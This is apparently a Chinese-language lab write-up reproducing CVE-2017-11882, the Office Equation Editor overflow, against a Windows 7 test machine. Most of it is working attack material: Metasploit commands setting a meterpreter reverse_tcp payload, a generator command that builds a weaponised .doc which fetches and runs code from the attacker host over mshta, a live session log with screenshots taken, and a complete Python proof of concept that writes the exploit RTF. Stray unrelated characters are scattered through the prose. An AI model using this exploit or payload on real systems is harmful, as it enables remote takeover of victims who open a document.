漏洞復現(xiàn)

漏洞概述：

此漏洞是由Office軟件里面的 [公式編輯器] 造成的您朽，由于編輯器進程沒有對名稱長度進行校驗铸史，導致緩沖區(qū)溢出举庶，攻擊者通過構造特殊的字符怒坯，可以實現(xiàn)任意代碼執(zhí)行粒没。

影響范圍：

office 2003 
office 2007 
office 2010 
office 2013 
office 2016

漏洞復現(xiàn)

復現(xiàn)環(huán)境：

滲透機：Kali Linux + POC代碼 
靶機：Win7 + Office 2016

過程：

root@kali:~/Desktop# cd /usr/share/metasploit-framework/modules/exploits/windows/smb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/shell.rb CVE-2017-11882.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls
CVE-2017-11882.rb             ms06_070_wkssvc.rb
generic_smb_dll_injection.rb  ms07_029_msdns_zonename.rb
group_policy_startup.rb       ms08_067_netapi.rb
ipass_pipe_exec.rb            ms09_050_smb2_negotiate_func_index.rb
ms03_049_netapi.rb            ms10_046_shortcut_icon_dllloader.rb
ms04_007_killbill.rb          ms10_061_spoolss.rb
ms04_011_lsass.rb             ms15_020_shortcut_icon_dllloader.rb
ms04_031_netdde.rb            ms17_010_eternalblue.rb
ms05_039_pnp.rb               netidentity_xtierrpcpipe.rb
ms06_025_rasmans_reg.rb       psexec_psh.rb
ms06_025_rras.rb              psexec.rb
ms06_040_netapi.rb            smb_delivery.rb
ms06_066_nwapi.rb             smb_relay.rb
ms06_066_nwwks.rb             timbuktu_plughntcommand_bof.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cd ~
root@kali:~/Desktop/CVE-2017-11882# msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.17-dev                         ]
+ -- --=[ 1704 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search CVE-2017-11882
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   exploit/windows/smb/CVE-2017-11882                   normal  Microsoft Office Payload Delivery

使用CVE-2017-11882.rb模塊旬蟋，開啟Meterpreter監(jiān)聽會話：

msf > use exploit/windows/smb/CVE-2017-11882  #使用模塊
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp #設置tcp反彈會話 
payload => windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.159.131 #設置滲透機ip地址
lhost => 192.168.159.131
msf exploit(CVE-2017-11882) > set uripath 11882 #設置路徑為11882，可自定義 
uripath => 11882
msf exploit(CVE-2017-11882) > exploit #開啟滲透革娄，進入監(jiān)聽狀態(tài)
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.159.131:4444 
[*] Using URL: http://0.0.0.0:8080/11882
[*] Local IP: http://192.168.159.131:8080/11882
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.159.131:8080/11882"

此時倾贰，通過Xshell打開另一個ssh冕碟，生成攻擊文件：

root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.159.131:8080/11882" -o 11882.doc
[*] Done ! output file >> 11882.doc <<

將生成的文件拷貝到win7靶機中運行，在kalilinux中可以看到：

msf exploit(CVE-2017-11882) > [*] 192.168.159.129  CVE-2017-11882 - Delivering payload
[*] Sending stage (179267 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.131:4444 -> 192.168.159.129:49276) at 2018-03-25 11:12:17 -0400
msf exploit(CVE-2017-11882) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  WIN-445T0DU91CM\Jason @ WIN-445T0DU91CM  192.168.159.131:4444 -> 192.168.159.129:49276 (192.168.159.129)


msf exploit(CVE-2017-11882) > sessions 1 #進入會話
[*] Starting interaction with 1...

meterpreter > sysinfo #查看系統(tǒng)信息 
Computer        : WIN-445T0DU91CM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid #查看當前用戶 
Server username: WIN-445T0DU91CM\Jason
meterpreter > screenshot #截屏 
Screenshot saved to: /root/Desktop/CVE-2017-11882/OcONktUN.jpeg
meterpreter > 

修復

1. 在線更新安寺，開啟Windows Update更新。
2. 打補丁挑庶，此漏洞對應的微軟補丁地址：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

POC代碼：

import argparse
import sys


RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""


RTF_TRAILER = R"""\par}
"""


OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """


OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""


OBJDATA_TEMPLATE = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""


COMMAND_OFFSET = 0x949*2


def create_ole_exec_primitive(command):
    if len(command) > 43:
        print "[!] Primitive command must be shorter than 43 bytes"
        sys.exit(0)
    hex_command = command.encode("hex")
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER



def create_rtf(header,command,trailer):
    ole1 = create_ole_exec_primitive(command + " &")
    
    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + trailer



if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--command", help="Command to execute.", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

    args = parser.parse_args()

    rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
    
    output_file = open(args.output, "w")
    output_file.write(rtf_content)

    print "[*] Done ! output file >> " + args.output  +" <<"